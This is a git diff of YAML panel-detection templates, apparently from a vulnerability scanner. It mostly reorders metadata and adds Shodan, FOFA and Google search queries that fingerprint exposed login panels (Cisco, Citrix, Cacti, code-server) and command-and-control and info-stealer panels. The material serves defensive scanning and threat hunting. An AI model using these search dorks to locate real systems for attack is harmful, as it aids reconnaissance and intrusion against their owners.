a/http/exposed-panels/c2/empire-c2.yaml b/http/exposed-panels/c2/empire-c2.yaml index 33aa844a71..8704c38beb 100644 --- a/http/exposed-panels/c2/empire-c2.yaml +++ b/http/exposed-panels/c2/empire-c2.yaml @@ -10,9 +10,9 @@ info: - https://github.com/thehappydinoa/awesome-censys-queries#security-applications - https://bc-security.gitbook.io/empire-wiki/ metadata: - censys-query: bc517bf173440dad15b99a051389fadc366d5df2 || dcb32e6256459d3660fdc90e4c79e95a921841cc - max-request: 1 verified: "true" + max-request: 1 + censys-query: bc517bf173440dad15b99a051389fadc366d5df2 || dcb32e6256459d3660fdc90e4c79e95a921841cc tags: c2,ir,osint,empire,panel http: diff --git a/http/exposed-panels/c2/evilginx.yaml b/http/exposed-panels/c2/evilginx.yaml index 33fe9927d3..a337c6bf28 100644 --- a/http/exposed-panels/c2/evilginx.yaml +++ b/http/exposed-panels/c2/evilginx.yaml @@ -9,9 +9,9 @@ info: reference: - https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-infrastructure/delivery/evilginx metadata: - censys-query: b18d778b4e4b6bf1fd5b2d790c941270145a6a6d - max-request: 1 verified: "true" + max-request: 1 + censys-query: b18d778b4e4b6bf1fd5b2d790c941270145a6a6d tags: tech,evilginx,c2,phishing,panel http: diff --git a/http/exposed-panels/c2/hack5-cloud-c2.yaml b/http/exposed-panels/c2/hack5-cloud-c2.yaml index 3a591b9c05..f2bb9eb10f 100644 --- a/http/exposed-panels/c2/hack5-cloud-c2.yaml +++ b/http/exposed-panels/c2/hack5-cloud-c2.yaml @@ -9,9 +9,9 @@ info: reference: - https://twitter.com/fofabot/status/1742737671037091854 metadata: - fofa-query: app="Hak5-C2" - max-request: 1 verified: true + max-request: 1 + fofa-query: app="Hak5-C2" tags: c2,ir,osint,hack5c2,panel http: diff --git a/http/exposed-panels/c2/hookbot-rat.yaml b/http/exposed-panels/c2/hookbot-rat.yaml index b5859c0e76..800de730da 100644 --- a/http/exposed-panels/c2/hookbot-rat.yaml +++ b/http/exposed-panels/c2/hookbot-rat.yaml @@ -7,9 +7,9 @@ info: description: | Hookbot panel were detected. metadata: + verified: true max-request: 1 shodan-query: title:"hookbot" - verified: true tags: tech,rat,hookbot,c2,panel,detect http: diff --git a/http/exposed-panels/c2/meduza-stealer.yaml b/http/exposed-panels/c2/meduza-stealer.yaml index d0656a3536..e2d64c3292 100644 --- a/http/exposed-panels/c2/meduza-stealer.yaml +++ b/http/exposed-panels/c2/meduza-stealer.yaml @@ -7,9 +7,9 @@ info: description: | Meduza Stealer panel were detected. metadata: + verified: "true" max-request: 1 shodan-query: http.title:"Meduza Stealer" - verified: "true" tags: rat,meduza-stealer,c2,panel http: diff --git a/http/exposed-panels/c2/mystic-stealer.yaml b/http/exposed-panels/c2/mystic-stealer.yaml index cb4971803b..9407d10f67 100644 --- a/http/exposed-panels/c2/mystic-stealer.yaml +++ b/http/exposed-panels/c2/mystic-stealer.yaml @@ -7,9 +7,9 @@ info: description: | Mystic Stealer panel were detected. metadata: + verified: "true" max-request: 1 shodan-query: http.title:"Mystic Stealer" - verified: "true" tags: tech,rat,mystic-stealer,c2,panel http: diff --git a/http/exposed-panels/c2/mythic-c2.yaml b/http/exposed-panels/c2/mythic-c2.yaml index 6c80b2a5fb..7ae2886353 100644 --- a/http/exposed-panels/c2/mythic-c2.yaml +++ b/http/exposed-panels/c2/mythic-c2.yaml @@ -10,9 +10,9 @@ info: reference: | https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/ metadata: + verified: true max-request: 1 shodan-query: ssl:Mythic port:7443 - verified: true tags: c2,ir,osint,mythic,panel http: diff --git a/http/exposed-panels/c2/nh-c2.yaml b/http/exposed-panels/c2/nh-c2.yaml index 4dc4466b6a..b05a9f341b 100644 --- a/http/exposed-panels/c2/nh-c2.yaml +++ b/http/exposed-panels/c2/nh-c2.yaml @@ -7,9 +7,9 @@ info: reference: - https://twitter.com/MichalKoczwara/status/1616179246216396806 metadata: - censys-query: 10baf5fcdde4563d3e145a1f553ae433fb1c3572 - max-request: 1 verified: "true" + max-request: 1 + censys-query: 10baf5fcdde4563d3e145a1f553ae433fb1c3572 tags: tech,nh,c2,panel http: diff --git a/http/exposed-panels/c2/pupyc2.yaml b/http/exposed-panels/c2/pupyc2.yaml index 694db8c8f7..ed163b0dc9 100644 --- a/http/exposed-panels/c2/pupyc2.yaml +++ b/http/exposed-panels/c2/pupyc2.yaml @@ -10,9 +10,9 @@ info: - https://twitter.com/TLP_R3D/status/1654038602282565632 - https://github.com/n1nj4sec/pupy metadata: + verified: true max-request: 1 shodan-query: aa3939fc357723135870d5036b12a67097b03309 - verified: true tags: c2,ir,osint,pupyc2,panel http: diff --git a/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml b/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml index 02959fa844..71479d7822 100644 --- a/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml +++ b/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml @@ -8,8 +8,8 @@ info: - https://twitter.com/0xperator/status/1677873700610162690 - https://github.com/alex14324/Rhadamanthys-Stealer metadata: - max-request: 1 verified: true + max-request: 1 tags: c2,rhadamanthys,stealer,panel http: diff --git a/http/exposed-panels/c2/supershell-c2.yaml b/http/exposed-panels/c2/supershell-c2.yaml index 0de7bff39c..821db9b4ab 100644 --- a/http/exposed-panels/c2/supershell-c2.yaml +++ b/http/exposed-panels/c2/supershell-c2.yaml @@ -10,9 +10,9 @@ info: - https://twitter.com/S4nsLimit3/status/1693619836339859497 - https://github.com/tdragon6/Supershell/blob/main/README_EN.md metadata: - fofa-query: icon_hash="-1010228102" - max-request: 1 verified: true + max-request: 1 + fofa-query: icon_hash="-1010228102" tags: c2,ir,osint,supershell,panel http: diff --git a/http/exposed-panels/c2/viper-c2.yaml b/http/exposed-panels/c2/viper-c2.yaml index 88ce93aee0..8a26d2021e 100644 --- a/http/exposed-panels/c2/viper-c2.yaml +++ b/http/exposed-panels/c2/viper-c2.yaml @@ -9,10 +9,10 @@ info: reference: - https://twitter.com/MichalKoczwara/status/1635724410274414596 metadata: - censys-query: 057f3b5488605b4d224d038e340866e2cdfed4a3 + verified: "true" max-request: 1 shodan-query: http.html_hash:1015055567 - verified: "true" + censys-query: 057f3b5488605b4d224d038e340866e2cdfed4a3 tags: tech,viper,c2,malware,ir,panel http: diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index e998a1a95e..0f8fda5aac 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -14,10 +14,20 @@ info: metadata: verified: true max-request: 2 - product: cacti vendor: cacti - shodan-query: http.favicon.hash:-1797138069 - fofa-query: icon_hash="-1797138069" + product: cacti + shodan-query: + - http.favicon.hash:-1797138069 + - http.title:"login to cacti" + - http.title:"cacti" + - http.favicon.hash:"-1797138069" + fofa-query: + - icon_hash="-1797138069" + - title="cacti" + - title="login to cacti" + google-query: + - intitle:"login to cacti" + - intitle:"cacti" tags: cacti,login,panel,detect http: diff --git a/http/exposed-panels/cas-login.yaml b/http/exposed-panels/cas-login.yaml index 69deb8264c..b5d77d6898 100644 --- a/http/exposed-panels/cas-login.yaml +++ b/http/exposed-panels/cas-login.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apereo:central_authentication_service:*:*:*:*:*:*:*:* metadata: - github: https://github.com/apereo/cas max-request: 1 - product: central_authentication_service - shodan-query: http.title:'CAS - Central Authentication Service' vendor: apereo + product: central_authentication_service + shodan-query: + - http.title:'CAS - Central Authentication Service' + - http.title:'cas - central authentication service' + github: https://github.com/apereo/cas + fofa-query: title='cas - central authentication service' + google-query: intitle:'cas - central authentication service' tags: apereo,cas,panel,login http: diff --git a/http/exposed-panels/casaos-panel.yaml b/http/exposed-panels/casaos-panel.yaml index 60d8bec6a2..17fbcb2c03 100644 --- a/http/exposed-panels/casaos-panel.yaml +++ b/http/exposed-panels/casaos-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: html:"CasaOS" - verified: true tags: panel,casaos,login,detect http: diff --git a/http/exposed-panels/casdoor-login.yaml b/http/exposed-panels/casdoor-login.yaml index a425aef2af..768bacaee8 100644 --- a/http/exposed-panels/casdoor-login.yaml +++ b/http/exposed-panels/casdoor-login.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: casdoor - shodan-query: http.title:"Casdoor" vendor: casbin + product: casdoor + shodan-query: + - http.title:"Casdoor" + - http.title:"casdoor" + fofa-query: title="casdoor" + google-query: intitle:"casdoor" tags: panel,casdoor,casbin http: diff --git a/http/exposed-panels/casemanager-panel.yaml b/http/exposed-panels/casemanager-panel.yaml index a86d060782..dc546b3df7 100644 --- a/http/exposed-panels/casemanager-panel.yaml +++ b/http/exposed-panels/casemanager-panel.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="CaseManager" max-request: 1 + fofa-query: title="CaseManager" tags: casemanager,panel http: diff --git a/http/exposed-panels/caton-network-manager-system.yaml b/http/exposed-panels/caton-network-manager-system.yaml index 5ea1913c64..830c9c5ea5 100644 --- a/http/exposed-panels/caton-network-manager-system.yaml +++ b/http/exposed-panels/caton-network-manager-system.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Caton Network Manager System" - verified: true tags: caton,manager,login,panel http: diff --git a/http/exposed-panels/ccm-detect.yaml b/http/exposed-panels/ccm-detect.yaml index 9244e1dd55..dbea138b5a 100644 --- a/http/exposed-panels/ccm-detect.yaml +++ b/http/exposed-panels/ccm-detect.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"CCM - Authentication Failure" - verified: true tags: panel,clearcom,ccm http: diff --git a/http/exposed-panels/centreon-panel.yaml b/http/exposed-panels/centreon-panel.yaml index 58f87a48a1..3a5ebe2336 100644 --- a/http/exposed-panels/centreon-panel.yaml +++ b/http/exposed-panels/centreon-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:centreon:centreon_web:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: centreon_web - shodan-query: http.title:"Centreon" vendor: centreon + product: centreon_web + shodan-query: + - http.title:"Centreon" + - http.title:"centreon" + fofa-query: title="centreon" + google-query: intitle:"centreon" tags: panel,centreon,login http: diff --git a/http/exposed-panels/changedetection-panel.yaml b/http/exposed-panels/changedetection-panel.yaml index 9d1bbc86a7..bf62f88b06 100644 --- a/http/exposed-panels/changedetection-panel.yaml +++ b/http/exposed-panels/changedetection-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/dgtlmoon/changedetection.io - https://changedetection.io/ metadata: + verified: true max-request: 1 shodan-query: title:"Change Detection" - verified: true tags: panel,changedetection,detect http: diff --git a/http/exposed-panels/checkmk/checkmk-login.yaml b/http/exposed-panels/checkmk/checkmk-login.yaml index b423ced58d..bec999ce36 100644 --- a/http/exposed-panels/checkmk/checkmk-login.yaml +++ b/http/exposed-panels/checkmk/checkmk-login.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:tribe29:checkmk:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: checkmk vendor: tribe29 + product: checkmk tags: login,tech,synology,rackstation,panel,tribe29 http: diff --git a/http/exposed-panels/checkpoint/ssl-network-extender.yaml b/http/exposed-panels/checkpoint/ssl-network-extender.yaml index 336df52378..43f430fc67 100644 --- a/http/exposed-panels/checkpoint/ssl-network-extender.yaml +++ b/http/exposed-panels/checkpoint/ssl-network-extender.yaml @@ -13,11 +13,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:checkpoint:ssl_network_extender:*:*:*:*:-:*:*:* metadata: - google-query: intitle:"SSL Network Extender Login" max-request: 1 - product: ssl_network_extender - shodan-query: http.title:"Check Point SSL Network Extender" vendor: checkpoint + product: ssl_network_extender + shodan-query: + - http.title:"Check Point SSL Network Extender" + - http.title:"check point ssl network extender" + - http.title:"ssl network extender login" + google-query: + - intitle:"SSL Network Extender Login" + - intitle:"ssl network extender login" + - intitle:"check point ssl network extender" + fofa-query: + - title="check point ssl network extender" + - title="ssl network extender login" tags: panel,checkpoint,router http: diff --git a/http/exposed-panels/chronos-panel.yaml b/http/exposed-panels/chronos-panel.yaml index fdb20d8a8d..aabc6e2ab0 100644 --- a/http/exposed-panels/chronos-panel.yaml +++ b/http/exposed-panels/chronos-panel.yaml @@ -9,10 +9,10 @@ info: reference: - https://www.asys.fr/chronos metadata: - fofa-query: body="chronoslogin.js" + verified: true max-request: 1 shodan-query: http.html:"chronoslogin.js" - verified: true + fofa-query: body="chronoslogin.js" tags: panel,chronos,login,detect http: diff --git a/http/exposed-panels/cisco-firepower-panel.yaml b/http/exposed-panels/cisco-firepower-panel.yaml index da59aded97..e0aaac88e8 100644 --- a/http/exposed-panels/cisco-firepower-panel.yaml +++ b/http/exposed-panels/cisco-firepower-panel.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: html:"cisco firepower management" - verified: true tags: login,cisco,panel,console http: diff --git a/http/exposed-panels/cisco-unity-panel.yaml b/http/exposed-panels/cisco-unity-panel.yaml index e109b0e066..210792249c 100644 --- a/http/exposed-panels/cisco-unity-panel.yaml +++ b/http/exposed-panels/cisco-unity-panel.yaml @@ -7,9 +7,9 @@ info: description: | A Cisco Unity Connection instance was detected. metadata: + verified: true max-request: 2 shodan-query: html:"Cisco Unity Connection" - verified: true tags: panel,cisco,unity,login,detect http: diff --git a/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml b/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml index 0d3f6df1d7..0514ce24e8 100644 --- a/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml +++ b/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:cisco:anyconnect_secure_mobility_client:*:*:*:*:windows:*:*:* metadata: max-request: 1 - product: anyconnect_secure_mobility_client vendor: cisco + product: anyconnect_secure_mobility_client tags: cisco,panel,vpn http: diff --git a/http/exposed-panels/cisco/cisco-asa-panel.yaml b/http/exposed-panels/cisco/cisco-asa-panel.yaml index 549f7107cc..03b963d458 100644 --- a/http/exposed-panels/cisco/cisco-asa-panel.yaml +++ b/http/exposed-panels/cisco/cisco-asa-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: adaptive_security_appliance_software vendor: cisco + product: adaptive_security_appliance_software tags: cisco,panel http: diff --git a/http/exposed-panels/cisco/cisco-edge-340.yaml b/http/exposed-panels/cisco/cisco-edge-340.yaml index 58777fc4cb..7f2098c09c 100644 --- a/http/exposed-panels/cisco/cisco-edge-340.yaml +++ b/http/exposed-panels/cisco/cisco-edge-340.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:o:cisco:edge_340_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: edge_340_firmware - shodan-query: http.title:"Cisco Edge 340" vendor: cisco + product: edge_340_firmware + shodan-query: + - http.title:"Cisco Edge 340" + - http.title:"cisco edge 340" + fofa-query: title="cisco edge 340" + google-query: intitle:"cisco edge 340" tags: panel,cisco http: diff --git a/http/exposed-panels/cisco/cisco-expressway-panel.yaml b/http/exposed-panels/cisco/cisco-expressway-panel.yaml index da05d10e66..9de3c2a082 100644 --- a/http/exposed-panels/cisco/cisco-expressway-panel.yaml +++ b/http/exposed-panels/cisco/cisco-expressway-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.cisco.com/c/en/us/products/unified-communications/expressway-series/index.html metadata: + verified: true max-request: 1 shodan-query: html:"Cisco Expressway" - verified: true tags: panel,cisco,login,detect http: diff --git a/http/exposed-panels/cisco/cisco-finesse-login.yaml b/http/exposed-panels/cisco/cisco-finesse-login.yaml index 6cc147d625..ff8298d87d 100644 --- a/http/exposed-panels/cisco/cisco-finesse-login.yaml +++ b/http/exposed-panels/cisco/cisco-finesse-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:cisco:finesse:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: finesse vendor: cisco + product: finesse tags: panel,cisco,edb http: diff --git a/http/exposed-panels/cisco/cisco-integrated-login.yaml b/http/exposed-panels/cisco/cisco-integrated-login.yaml index 05e8a275bc..449bdaf726 100644 --- a/http/exposed-panels/cisco/cisco-integrated-login.yaml +++ b/http/exposed-panels/cisco/cisco-integrated-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:cisco:integrated_management_controller:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: integrated_management_controller vendor: cisco + product: integrated_management_controller tags: panel,cisco,edb http: diff --git a/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml b/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml index 5dbc02e7fb..5e56c0a84d 100644 --- a/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml +++ b/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml @@ -13,11 +13,11 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:* metadata: + verified: "true" max-request: 2 + vendor: cisco product: ios_xe shodan-query: http.html_hash:1076109428 - vendor: cisco - verified: "true" tags: panel,cisco,ssl ssl: - address: "{{Host}}:{{Port}}" diff --git a/http/exposed-panels/cisco/cisco-onprem-panel.yaml b/http/exposed-panels/cisco/cisco-onprem-panel.yaml index 619ff6936c..19e0a2a994 100644 --- a/http/exposed-panels/cisco/cisco-onprem-panel.yaml +++ b/http/exposed-panels/cisco/cisco-onprem-panel.yaml @@ -12,12 +12,17 @@ info: classification: cpe: cpe:2.3:a:cisco:smart_software_manager_on-prem:*:*:*:*:*:*:*:* metadata: - fofa-query: title="On-Prem License Workspace" - max-request: 2 - product: smart_software_manager_on-prem - shodan-query: title:"On-Prem License Workspace" - vendor: cisco verified: true + max-request: 2 + vendor: cisco + product: smart_software_manager_on-prem + shodan-query: + - title:"On-Prem License Workspace" + - http.title:"on-prem license workspace" + fofa-query: + - title="On-Prem License Workspace" + - title="on-prem license workspace" + google-query: intitle:"on-prem license workspace" tags: cisco,manager,login,panel http: diff --git a/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml b/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml index 589de4f482..aec2c61881 100644 --- a/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml +++ b/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml @@ -12,9 +12,11 @@ info: cpe: cpe:2.3:a:cisco:prime_infrastructure:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco product: prime_infrastructure shodan-query: http.title:"prime infrastructure" - vendor: cisco + fofa-query: title="prime infrastructure" + google-query: intitle:"prime infrastructure" tags: panel,cisco http: diff --git a/http/exposed-panels/cisco/cisco-sd-wan.yaml b/http/exposed-panels/cisco/cisco-sd-wan.yaml index 383fa25abe..55b2fa514c 100644 --- a/http/exposed-panels/cisco/cisco-sd-wan.yaml +++ b/http/exposed-panels/cisco/cisco-sd-wan.yaml @@ -13,8 +13,9 @@ info: cpe: cpe:2.3:a:cisco:sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: sd-wan vendor: cisco + product: sd-wan + shodan-query: cpe:"cpe:2.3:a:cisco:sd-wan" tags: panel,cisco http: diff --git a/http/exposed-panels/cisco/cisco-secure-desktop.yaml b/http/exposed-panels/cisco/cisco-secure-desktop.yaml index 7bb349dd37..ccd059d5bd 100644 --- a/http/exposed-panels/cisco/cisco-secure-desktop.yaml +++ b/http/exposed-panels/cisco/cisco-secure-desktop.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:cisco:secure_desktop:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: secure_desktop vendor: cisco + product: secure_desktop tags: cisco,panel http: diff --git a/http/exposed-panels/cisco/cisco-systems-login.yaml b/http/exposed-panels/cisco/cisco-systems-login.yaml index bf615685c0..60e1bdb3c4 100644 --- a/http/exposed-panels/cisco/cisco-systems-login.yaml +++ b/http/exposed-panels/cisco/cisco-systems-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Cisco Systems Login" max-request: 1 shodan-query: http.title:"Cisco Systems Login" + google-query: intitle:"Cisco Systems Login" tags: panel,cisco http: diff --git a/http/exposed-panels/cisco/cisco-telepresence.yaml b/http/exposed-panels/cisco/cisco-telepresence.yaml index a15f79e67a..e8ca2df71e 100644 --- a/http/exposed-panels/cisco/cisco-telepresence.yaml +++ b/http/exposed-panels/cisco/cisco-telepresence.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Cisco Telepresence" - verified: true tags: panel,cisco http: diff --git a/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml b/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml index fbd57909eb..ecd9d822e1 100644 --- a/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml +++ b/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:cisco:unified_computing_system:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: unified_computing_system - shodan-query: http.title:"Cisco UCS KVM Direct" vendor: cisco + product: unified_computing_system + shodan-query: + - http.title:"Cisco UCS KVM Direct" + - http.title:"cisco ucs kvm direct" + fofa-query: title="cisco ucs kvm direct" + google-query: intitle:"cisco ucs kvm direct" tags: panel,cisco,ucs,kvm http: diff --git a/http/exposed-panels/cisco/cisco-vmanage-login.yaml b/http/exposed-panels/cisco/cisco-vmanage-login.yaml index 387f20f781..d2d07d5e06 100644 --- a/http/exposed-panels/cisco/cisco-vmanage-login.yaml +++ b/http/exposed-panels/cisco/cisco-vmanage-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Cisco vManage" - verified: true tags: panel,cisco http: diff --git a/http/exposed-panels/cisco/cisco-webvpn-detect.yaml b/http/exposed-panels/cisco/cisco-webvpn-detect.yaml index 3c1915c944..d5f5f710a5 100644 --- a/http/exposed-panels/cisco/cisco-webvpn-detect.yaml +++ b/http/exposed-panels/cisco/cisco-webvpn-detect.yaml @@ -11,10 +11,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true + max-request: 2 fofa-query: fid="U1TP/SJklrT9VLIEpZkQNg==" google-query: intitle:"SSLVPN Service" - max-request: 2 - verified: true tags: panel,cisco,vpn http: diff --git a/http/exposed-panels/citrix-adc-gateway-detect.yaml b/http/exposed-panels/citrix-adc-gateway-detect.yaml index d531e2a1be..08f1b7b8a5 100644 --- a/http/exposed-panels/citrix-adc-gateway-detect.yaml +++ b/http/exposed-panels/citrix-adc-gateway-detect.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: gateway vendor: citrix + product: gateway + shodan-query: http.title:"citrix gateway" + fofa-query: title="citrix gateway" + google-query: intitle:"citrix gateway" tags: panel,citrix http: diff --git a/http/exposed-panels/citrix-vpn-detect.yaml b/http/exposed-panels/citrix-vpn-detect.yaml index 804efdc634..057c563043 100644 --- a/http/exposed-panels/citrix-vpn-detect.yaml +++ b/http/exposed-panels/citrix-vpn-detect.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: gateway vendor: citrix + product: gateway + shodan-query: http.title:"citrix gateway" + fofa-query: title="citrix gateway" + google-query: intitle:"citrix gateway" tags: panel,citrix http: diff --git a/http/exposed-panels/claris-filemaker-webdirect.yaml b/http/exposed-panels/claris-filemaker-webdirect.yaml index 74349c7f7c..13d3f8d43b 100644 --- a/http/exposed-panels/claris-filemaker-webdirect.yaml +++ b/http/exposed-panels/claris-filemaker-webdirect.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Claris FileMaker WebDirect" - verified: true tags: panel,edb http: diff --git a/http/exposed-panels/cleanweb-panel.yaml b/http/exposed-panels/cleanweb-panel.yaml index b98d5b4879..2b542faa6f 100644 --- a/http/exposed-panels/cleanweb-panel.yaml +++ b/http/exposed-panels/cleanweb-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://tentelemed.com/ metadata: + verified: true max-request: 1 shodan-query: http.title:"CleanWeb" - verified: true tags: panel,cleanweb,login,detect http: diff --git a/http/exposed-panels/clearpass-policy-manager.yaml b/http/exposed-panels/clearpass-policy-manager.yaml index bcd204dd5a..bca7f74b0f 100644 --- a/http/exposed-panels/clearpass-policy-manager.yaml +++ b/http/exposed-panels/clearpass-policy-manager.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:arubanetworks:clearpass_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: clearpass_policy_manager - shodan-query: http.title:"ClearPass Policy Manager" vendor: arubanetworks + product: clearpass_policy_manager + shodan-query: + - http.title:"ClearPass Policy Manager" + - http.title:"clearpass policy manager" + fofa-query: title="clearpass policy manager" + google-query: intitle:"clearpass policy manager" tags: panel,aruba,arubanetworks http: diff --git a/http/exposed-panels/cloudpanel-login.yaml b/http/exposed-panels/cloudpanel-login.yaml index 15eefeca35..4bc6245370 100644 --- a/http/exposed-panels/cloudpanel-login.yaml +++ b/http/exposed-panels/cloudpanel-login.yaml @@ -7,12 +7,18 @@ info: classification: cpe: cpe:2.3:a:mgt-commerce:cloudpanel:*:*:*:*:*:*:*:* metadata: - fofa-query: icon_hash="151132309" - max-request: 1 - product: cloudpanel - shodan-query: http.favicon.hash:151132309 - vendor: mgt-commerce verified: true + max-request: 1 + vendor: mgt-commerce + product: cloudpanel + shodan-query: + - http.favicon.hash:151132309 + - http.title:"cloudpanel" + - http.favicon.hash:"151132309" + fofa-query: + - icon_hash="151132309" + - title="cloudpanel" + google-query: intitle:"cloudpanel" tags: panel,login,cloudpanel,detect,mgt-commerce http: diff --git a/http/exposed-panels/cobbler-webgui.yaml b/http/exposed-panels/cobbler-webgui.yaml index 003eb0353d..4f58e2981e 100644 --- a/http/exposed-panels/cobbler-webgui.yaml +++ b/http/exposed-panels/cobbler-webgui.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: cobbler - shodan-query: http.title:"Cobbler Web Interface" vendor: cobblerd + product: cobbler + shodan-query: + - http.title:"Cobbler Web Interface" + - http.title:"cobbler web interface" + fofa-query: title="cobbler web interface" + google-query: intitle:"cobbler web interface" tags: cobbler,webserver,panel,cobblerd http: diff --git a/http/exposed-panels/code-server-login.yaml b/http/exposed-panels/code-server-login.yaml index ce1f1d0854..5f480a786b 100644 --- a/http/exposed-panels/code-server-login.yaml +++ b/http/exposed-panels/code-server-login.yaml @@ -10,11 +10,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:coder:code-server:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: coder product: code-server shodan-query: http.title:"code-server login" - vendor: coder - verified: true + fofa-query: title="code-server login" + google-query: intitle:"code-server login" tags: panel,detect,misc,coder http: diff --git a/http/exposed-panels/code42-panel.yaml b/http/exposed-panels/code42-panel.yaml index afaf429022..41dd702fae 100644 --- a/http/exposed-panels/code42-panel.yaml +++ b/http/exposed-panels/code42-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:code42:code42:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: code42 vendor: code42 + product: code42 tags: panel,code42 http: diff --git a/http/exposed-panels/codemeter-webadmin-panel.yaml b/http/exposed-panels/codemeter-webadmin-panel.yaml index c4dd8324f3..eac42fd9b3 100644 --- a/http/exposed-panels/codemeter-webadmin-panel.yaml +++ b/http/exposed-panels/codemeter-webadmin-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:wibu:codemeter:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: codemeter vendor: wibu + product: codemeter tags: codemeter,webadmin,panel,wibu http: diff --git a/http/exposed-panels/coldfusion-administrator-login.yaml b/http/exposed-panels/coldfusion-administrator-login.yaml index 